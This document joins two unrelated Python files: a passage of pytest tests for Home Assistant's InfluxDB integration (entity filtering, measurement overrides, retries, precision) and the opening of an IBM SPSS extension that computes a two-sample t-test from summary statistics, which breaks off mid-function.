"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_allowlist_glob(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a glob allowlist."""
config = {"include": {"entity_globs": ["*.included_*"]}, "exclude": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.included_entity", True),
FilterTest("fake.denied", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_filtered_allowlist(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against an allowlist filtered by denylist."""
config = {
"include": {
"domains": ["fake"],
"entities": ["another_fake.included"],
"entity_globs": "*.included_*",
},
"exclude": {
"entities": ["fake.excluded"],
"domains": ["another_fake"],
"entity_globs": "*.excluded_*",
},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("another_fake.included", True),
FilterTest("test.included_entity", True),
FilterTest("fake.excluded", False),
FilterTest("another_fake.denied", False),
FilterTest("fake.excluded_entity", False),
FilterTest("another_fake.included_entity", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_filtered_denylist(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a domain/glob denylist with an entity id allowlist."""
config = {
"include": {"entities": ["another_fake.included", "fake.excluded_pass"]},
"exclude": {"domains": ["another_fake"], "entity_globs": "*.excluded_*"},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("another_fake.included", True),
FilterTest("fake.excluded_pass", True),
FilterTest("another_fake.denied", False),
FilterTest("fake.excluded_entity", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_invalid_type(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener when an attribute has an invalid type."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
# map of HA State to valid influxdb [state, value] fields
valid = {
"1": [None, 1],
"1.0": [None, 1.0],
STATE_ON: [STATE_ON, 1],
STATE_OFF: [STATE_OFF, 0],
STATE_STANDBY: [STATE_STANDBY, None],
"foo": ["foo", None],
}
for in_, out in valid.items():
attrs = {
"unit_of_measurement": "foobars",
"longitude": "1.1",
"latitude": "2.2",
"invalid_attribute": ["value1", "value2"],
}
state = MagicMock(
state=in_,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "foobars",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {
"longitude": 1.1,
"latitude": 2.2,
"invalid_attribute_str": "['value1', 'value2']",
},
}
]
if out[0] is not None:
body[0]["fields"]["state"] = out[0]
if out[1] is not None:
body[0]["fields"]["value"] = out[1]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_default_measurement(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with a default measurement."""
config = {"default_measurement": "state"}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
state = MagicMock(
state=1,
domain="fake",
entity_id="fake.ok",
object_id="ok",
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "state",
"tags": {"domain": "fake", "entity_id": "ok"},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_unit_of_measurement_field(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener for unit of measurement field."""
config = {"override_measurement": "state"}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
attrs = {"unit_of_measurement": "foobars"}
state = MagicMock(
state="foo",
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "state",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {"state": "foo", "unit_of_measurement_str": "foobars"},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_tags_attributes(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener when some attributes should be tags."""
config = {"tags_attributes": ["friendly_fake"]}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
attrs = {"friendly_fake": "tag_str", "field_fake": "field_str"}
state = MagicMock(
state=1,
domain="fake",
entity_id="fake.something",
object_id="something",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "fake.something",
"tags": {
"domain": "fake",
"entity_id": "something",
"friendly_fake": "tag_str",
},
"time": 12345,
"fields": {"value": 1, "field_fake_str": "field_str"},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_component_override_measurement(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with overridden measurements."""
config = {
"component_config": {
"sensor.fake_humidity": {"override_measurement": "humidity"}
},
"component_config_glob": {
"binary_sensor.*motion": {"override_measurement": "motion"}
},
"component_config_domain": {"climate": {"override_measurement": "hvac"}},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
test_components = [
{"domain": "sensor", "id": "fake_humidity", "res": "humidity"},
{"domain": "binary_sensor", "id": "fake_motion", "res": "motion"},
{"domain": "climate", "id": "fake_thermostat", "res": "hvac"},
{"domain": "other", "id": "just_fake", "res": "other.just_fake"},
]
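# One component per override level: an exact entity id, a glob, a domain,
# and an unconfigured fallback that keeps entity_id as the measurement.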
for comp in test_components:
state = MagicMock(
state=1,
domain=comp["domain"],
entity_id=f"{comp['domain']}.{comp['id']}",
object_id=comp["id"],
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": comp["res"],
"tags": {"domain": comp["domain"], "entity_id": comp["id"]},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_component_measurement_attr(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with a different measurement_attr."""
config = {
"measurement_attr": "domain__device_class",
"component_config": {
"sensor.fake_humidity": {"override_measurement": "humidity"}
},
"component_config_glob": {
"binary_sensor.*motion": {"override_measurement": "motion"}
},
"component_config_domain": {"climate": {"override_measurement": "hvac"}},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
test_components = [
{
"domain": "sensor",
"id": "fake_temperature",
"attrs": {"device_class": "humidity"},
"res": "sensor__humidity",
},
{"domain": "sensor", "id": "fake_humidity", "attrs": {}, "res": "humidity"},
{"domain": "binary_sensor", "id": "fake_motion", "attrs": {}, "res": "motion"},
{"domain": "climate", "id": "fake_thermostat", "attrs": {}, "res": "hvac"},
{"domain": "other", "id": "just_fake", "attrs": {}, "res": "other"},
]
for comp in test_components:
state = MagicMock(
state=1,
domain=comp["domain"],
entity_id=f"{comp['domain']}.{comp['id']}",
object_id=comp["id"],
attributes=comp["attrs"],
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": comp["res"],
"tags": {"domain": comp["domain"], "entity_id": comp["id"]},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_ignore_attributes(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with overridden measurements."""
config = {
"ignore_attributes": ["ignore"],
"component_config": {
"sensor.fake_humidity": {"ignore_attributes": ["id_ignore"]}
},
"component_config_glob": {
"binary_sensor.*motion": {"ignore_attributes": ["glob_ignore"]}
},
"component_config_domain": {
"climate": {"ignore_attributes": ["domain_ignore"]}
},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
test_components = [
{
"domain": "sensor",
"id": "fake_humidity",
"attrs": {"glob_ignore": 1, "domain_ignore": 1},
},
{
"domain": "binary_sensor",
"id": "fake_motion",
"attrs": {"id_ignore": 1, "domain_ignore": 1},
},
{
"domain": "climate",
"id": "fake_thermostat",
"attrs": {"id_ignore": 1, "glob_ignore": 1},
},
]
for comp in test_components:
entity_id = f"{comp['domain']}.{comp['id']}"
state = MagicMock(
state=1,
domain=comp["domain"],
entity_id=entity_id,
object_id=comp["id"],
attributes={
"ignore": 1,
"id_ignore": 1,
"glob_ignore": 1,
"domain_ignore": 1,
},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
fields = {"value": 1}
fields.update(comp["attrs"])
body = [
{
"measurement": entity_id,
"tags": {"domain": comp["domain"], "entity_id": comp["id"]},
"time": 12345,
"fields": fields,
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_ignore_attributes_overlapping_entities(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with overridden measurements."""
config = {
"component_config": {"sensor.fake": {"override_measurement": "units"}},
"component_config_domain": {"sensor": {"ignore_attributes": ["ignore"]}},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
state = MagicMock(
state=1,
domain="sensor",
entity_id="sensor.fake",
object_id="fake",
attributes={"ignore": 1},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "units",
"tags": {"domain": "sensor", "entity_id": "fake"},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_scheduled_write(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener retries after a write failure."""
config = {"max_retries": 1}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
state = MagicMock(
state=1,
domain="fake",
entity_id="entity.id",
object_id="entity",
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
write_api = get_write_api(mock_client)
write_api.side_effect = IOError("foo")
# Write fails
with patch.object(influxdb.time, "sleep") as mock_sleep:
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
assert mock_sleep.called
assert write_api.call_count == 2
# Write works again
write_api.side_effect = None
with patch.object(influxdb.time, "sleep") as mock_sleep:
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
assert not mock_sleep.called
assert write_api.call_count == 3
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_backlog_full(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener drops old events when backlog gets full."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
state = MagicMock(
state=1,
domain="fake",
entity_id="entity.id",
object_id="entity",
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
monotonic_time = 0
def fast_monotonic():
"""Monotonic time that ticks fast enough to cause a timeout."""
nonlocal monotonic_time
monotonic_time += 60
return monotonic_time
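# Each monotonic() call jumps the clock forward 60s, so the queued event
# exceeds the backlog timeout and is dropped before any write happens.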
with patch("homeassistant.components.influxdb.time.monotonic", new=fast_monotonic):
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
assert get_write_api(mock_client).call_count == 0
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_attribute_name_conflict(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener when an attribute conflicts with another field."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
attrs = {"value": "value_str"}
state = MagicMock(
state=1,
domain="fake",
entity_id="fake.something",
object_id="something",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "fake.something",
"tags": {"domain": "fake", "entity_id": "something"},
"time": 12345,
"fields": {"value": 1, "value__str": "value_str"},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call, test_exception",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
ConnectionError("fail"),
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
influxdb.exceptions.InfluxDBClientError("fail"),
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
influxdb.exceptions.InfluxDBServerError("fail"),
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
ConnectionError("fail"),
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
influxdb.ApiException(),
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_connection_failure_on_startup(
hass, caplog, mock_client, config_ext, get_write_api, get_mock_call, test_exception
):
"""Test the event listener when it fails to connect to Influx on startup."""
write_api = get_write_api(mock_client)
write_api.side_effect = test_exception
config = {"influxdb": config_ext}
with patch(f"{INFLUX_PATH}.event_helper") as event_helper:
assert await async_setup_component(hass, influxdb.DOMAIN, config)
await hass.async_block_till_done()
assert (
len([record for record in caplog.records if record.levelname == "ERROR"])
== 1
)
event_helper.call_later.assert_called_once()
hass.bus.listen.assert_not_called()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call, test_exception",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
influxdb.exceptions.InfluxDBClientError("fail", code=400),
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
influxdb.ApiException(status=400),
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_invalid_inputs_error(
hass, caplog, mock_client, config_ext, get_write_api, get_mock_call, test_exception
):
"""
Test the event listener when influx returns invalid inputs on write.
The difference in error handling in this case is that we do not sleep
and retry; if an input is invalid it is logged and dropped.
Note that this shouldn't actually occur: if it's possible for the current
code to send an invalid input, the code should be adjusted to prevent that.
But Influx is an external service so there may be edge cases that
haven't been encountered yet.
"""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
write_api = get_write_api(mock_client)
write_api.side_effect = test_exception
state = MagicMock(
state=1,
domain="fake",
entity_id="fake.something",
object_id="something",
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
with patch(f"{INFLUX_PATH}.time.sleep") as sleep:
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api.assert_called_once()
assert (
len([record for record in caplog.records if record.levelname == "ERROR"])
== 1
)
sleep.assert_not_called()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call, precision",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
"ns",
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
"ns",
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
"us",
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
"us",
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
"ms",
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
"ms",
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
"s",
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
"s",
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_precision(
hass, mock_client, config_ext, get_write_api, get_mock_call, precision
):
"""Test the precision setup."""
config = {
"precision": precision,
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
value = "1.9"
attrs = {
"unit_of_measurement": "foobars",
}
state = MagicMock(
state=value,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "foobars",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {"value": float(value)},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body, precision)
write_api.reset_mock()
|
|
#/***********************************************************************
# * Licensed Materials - Property of IBM
# *
# * IBM SPSS Products: Statistics Common
# *
# * (C) Copyright IBM Corp. 1989, 2020
# *
# * US Government Users Restricted Rights - Use, duplication or disclosure
# * restricted by GSA ADP Schedule Contract with IBM Corp.
# ************************************************************************/
"""SPSSINC SUMMARY TTEST extension command"""
__author__ = 'spss, JKP'
__version__ = '1.0.1'
# Initial formulas provided by Marta García-Granero.
# history
# 27-jan-2010 initial version
helptext = """SPSSINC SUMMARY TTEST N1=value(s) N2=value(s) MEAN1=value(s) MEAN2=value(s)
SD1=value(s) SD2=value(s) [CI=percentage] LABEL1=text(s) LABEL2=text(s)
[/HELP]
N1 and N2 are the case counts for the two samples.
MEAN1 and MEAN2 are the means.
SD1 and SD2 are the standard deviations.
LABEL1 and LABEL2 are optional labels for the samples as quoted text.
The N's, means, standard deviations, and labels can be lists of items.
One set of statistics is produced for each
item in the list. All the lists must be the same length.
CI is the confidence level expressed as a percentage. It defaults to 95.
/HELP displays this help and does nothing else.
"""
import spss, spssaux
from extension import Template, Syntax, processcmd
import sys, locale, random
from math import sqrt
class DataStep(object):
def __enter__(self):
"""initialization for with statement"""
try:
spss.StartDataStep()
except:
spss.Submit("EXECUTE")
spss.StartDataStep()
return self
def __exit__(self, type, value, tb):
spss.EndDataStep()
return False
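# Intended usage, as in the calls further down this module; EndDataStep runs
# even if the body raises, since __exit__ returns False:
#   with DataStep():
#       ds = spss.Dataset()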
class C(object): # for holding computation variables
pass
def summaryttest(n1, n2, mean1, mean2, sd1, sd2, ci=95., label1=None, label2=None):
"""Create a set of dummy variables that span the values of varname within any current filter.
The parameters are the obvious statistics.
label1 and label2 are text to label the two groups
"""
##debugging
#try:
#import wingdbstub
#if wingdbstub.debugger != None:
#import time
#wingdbstub.debugger.StopDebug()
#time.sleep(2)
#wingdbstub.debugger.StartDebug()
#except:
#pass
###myenc = locale.getlocale()[1] # get current encoding in case conversions needed
numtests = len(n1)
if label1 is None:
label1 = numtests * [_("Sample 1")]
if label2 is None:
label2 = numtests * [_("Sample 2")]
testlist = [len(item) for item in [n1, n2, mean1, mean2, sd1, sd2, label1, label2]]
if min(testlist) != max(testlist):
raise ValueError(_("The same number of values must be given for each statistic or label"))
currentactive = spss.ActiveDataset()
if currentactive == "*":
currentactive = "D" + str(random.uniform(0,1))
spss.Submit("DATASET NAME " + currentactive)
sl = 1 - ci/100.
halfsiglevel = 1.- sl/2.
c = []
for i in range(numtests):
c.append(C())
d = c[i]
if n1[i] < 1. or n2[i] < 1.:
raise ValueError(_("Sample sizes must be at least 1"))
d.sem1 = sd1[i]/sqrt(n1[i])
d.sem2 = sd2[i]/sqrt(n2[i])
d.diff = mean1[i] - mean2[i]
d.var1 = sd1[i]*sd1[i]
d.var2 = sd2[i]*sd2[i]
if d.var1 >= d.var2:
d.ftest = d.var1/d.var2
d.num = n1[i]
d.denom = n2[i]
else:
d.ftest = d.var2/d.var1
d.num = n2[i]
d.denom = n1[i]
d.n = n1[i] + n2[i]
d.poolvar = ((n1[i]-1.) * d.var1 + (n2[i]-1.) * d.var2)/(d.n-2.)
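# d.poolvar is the classic pooled variance estimate:
#   s_p^2 = ((n1-1)*s1^2 + (n2-1)*s2^2) / (n1 + n2 - 2)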
d.eedif1 = sqrt(d.poolvar*(1./n1[i]+1./n2[i]))
d.t1 = d.diff/d.eedif1
d.df1 = d.n-2.
d.eedif2 = sqrt(d.var1/n1[i]+d.var2/n2[i])
d.t2 = d.diff/d.eedif2
d.df2 = ((d.var1/n1[i]+d.var2/n2[i])**2)/(((d.var1/n1[i])**2)/(n1[i]-1.)+((d.var2/n2[i])**2)/(n2[i]-1.))
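# d.df2 is the Welch-Satterthwaite approximation to the degrees of freedom
# for the unequal-variance t test:
#   df = (v1/n1 + v2/n2)^2 / ((v1/n1)^2/(n1-1) + (v2/n2)^2/(n2-1))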
with DataStep():
###ds = spss.Dataset(None, hidden=True)
dsa = spss.Dataset() # current active
if len(dsa) == 0: # check for empty dataset automatically created when Statistics start
currentactive = None
ds = spss.Dataset(None)
dsname = ds.name
ds.varlist.append('n1',0)
ds.varlist.append('n2',0)
ds.varlist.append('ftest',0)
ds.varlist.append('df1',0)
ds.varlist.append('df2',0)
ds.varlist.append('halfsiglevel',0)
ds.varlist.append('num',0)
ds.varlist.append('denom',0)
ds.varlist.append('t1',0)
ds.varlist.append('t2',0) #9
for i in range(numtests):
d = c[i]
ds.cases.append([n1[i], n2[i], d.ftest, d.df1, d.df2, halfsiglevel, d.num, d.denom, d.t1, d.t2])
spss.SetActive(ds)
spss.Submit("""compute fsig = 1-cdf.f(ftest, num, denom).
compute t1sig=2*(1-cdf.t(abs(t1),df1)).
compute t2sig=2*(1-cdf.t(abs(t2),df2)).
compute idft1 = IDF.T(halfsiglevel,df1).
compute idft2 = IDF.T(halfsiglevel,df2).
compute norm = idf.normal(halfsiglevel,0,1).
execute.""")
with DataStep():
ds = spss.Dataset(dsname)
for i in range(numtests):
d = c[i]
d.fsig = ds.cases[i][10]
d.t1sig = ds.cases[i][11]
d.t2sig = ds.cases[i][12]
d.idft1 = ds.cases[i][13]
d.idft2 = ds.cases[i][14]
norm = abs(ds.cases[0][15])
ds.close()
spss.StartProcedure("Summary T-Test")
for i in range(numtests):
if numtests > 1:
seq = _("Test %d: ") % (i+1)
else:
seq = ""
d = c[i]
d.low1 = d.diff - norm * d.eedif1
d.upp1 = d.diff + norm * d.eedif1
d.low2 = d.diff - norm * d.eedif2
d.upp2 = d.diff + norm * d.eedif2
d.low1exact = d.diff - d.eedif1 * d.idft1
d.upp1exact = d.diff + d.eedif1 * d.idft1
d.low2exact = d.diff - d.eedif2 * d.idft2
d.upp2exact = d.diff + d.eedif2 * d.idft2
pt = NonProcPivotTable("Group Statistics", outlinetitle=_("Summary Data"), tabletitle=seq + _("Summary Data"),
columnlabels=[_("N"), _("Mean"), _("Std. Deviation"), _("Std. Error Mean")])
pt.addrow(rowlabel=label1[i], cvalues=[n1[i], mean1[i], sd1[i], d.sem1])
pt.addrow(rowlabel=label2[i], cvalues=[n2[i], mean2[i], sd2[i], d.sem2])
pt.generate()
pt = NonProcPivotTable("TTEST", outlinetitle=_("Independent Samples Test"),
tabletitle=seq +_("Independent Samples Test"), columnlabels=[_("Mean Difference"), _("Std. Error Difference"),
_("t"), _("df"), _("Sig. (2-tailed)")], caption=_("Hartley test for equal variance: F = %.3f, Sig. = %.4f") %(d.ftest, d.fsig))
pt.addrow(_("Equal variances assumed"), cvalues=[d.diff, d.eedif1, d.t1, d.df1, d.t1sig])
